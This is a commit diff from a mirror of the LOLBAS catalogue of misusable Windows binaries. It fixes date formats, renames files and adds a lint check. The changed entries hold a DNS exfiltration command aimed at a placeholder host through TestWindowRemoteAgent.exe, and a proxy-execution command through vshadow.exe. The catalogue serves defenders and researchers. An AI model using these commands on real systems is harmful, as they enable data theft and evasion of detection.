public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-28 15:58:24 +01:00
Code Issues Projects Releases Wiki Activity

Merge pull request #330 from LOLBAS-Project/fix/incorrect_date

Browse Source 
Enforcing YYYY-MM-DD format for dates (fixes #328)
This commit is contained in:
Conor Richard 2023-10-03 15:03:23 -04:00 committed by GitHub
commit 90f666e7a0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 8 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.github/workflows/yaml-linting.yml vendored
View File

@ -4,9 +4,12 @@ on: [push,pull_request]
jobs: jobs:
lintFiles: lintFiles:
if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- uses: actions/checkout@v3 - uses: actions/checkout@v3
- name: Check file extensions
run: if [[ $(find "${GITHUB.WORKSPACE}/yml" -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi
- name: yaml-lint - name: yaml-lint
uses: ibiqlik/action-yamllint@v3 uses: ibiqlik/action-yamllint@v3
with: with:

1
YML-Schema.yml
View File

@ -26,6 +26,7 @@ mapping:
required: true required: true
"Created": "Created":
type: date type: date
format: '%Y-%M-%d'
required: true required: true
"Commands": "Commands":
type: seq type: seq

4
yml/OtherMSBinaries/testwindowremoteagent.yaml → yml/OtherMSBinaries/Testwindowremoteagent.yml
View File

@ -2,12 +2,12 @@
Name: TestWindowRemoteAgent.exe Name: TestWindowRemoteAgent.exe
Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
Author: Onat Uzunyayla Author: Onat Uzunyayla
Created: 2023-21-08 Created: 2023-08-21
Commands: Commands:
- Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000 - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
Usecase: Attackers may utilize this to exfiltrate data over DNS Usecase: Attackers may utilize this to exfiltrate data over DNS
Category: Data Exfiltration Category: Upload
Privileges: User Privileges: User
MitreID: T1048 MitreID: T1048
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11

4
yml/OtherMSBinaries/vshadow.yaml → yml/OtherMSBinaries/Vshadow.yml
View File

@ -1,10 +1,10 @@
--- ---
Name: vshadow.exe Name: Vshadow.exe
Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies. Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
Author: Ayberk Halaç Author: Ayberk Halaç
Created: 2023-09-06 Created: 2023-09-06
Commands: Commands:
- Command: vshadow.exe -nw -exec=c:\windows\system32\calc.exe C: - Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:'
Description: Executes calc.exe from vshadow.exe. Description: Executes calc.exe from vshadow.exe.
Usecase: Performs execution of specified executable file. Usecase: Performs execution of specified executable file.
Category: Execute Category: Execute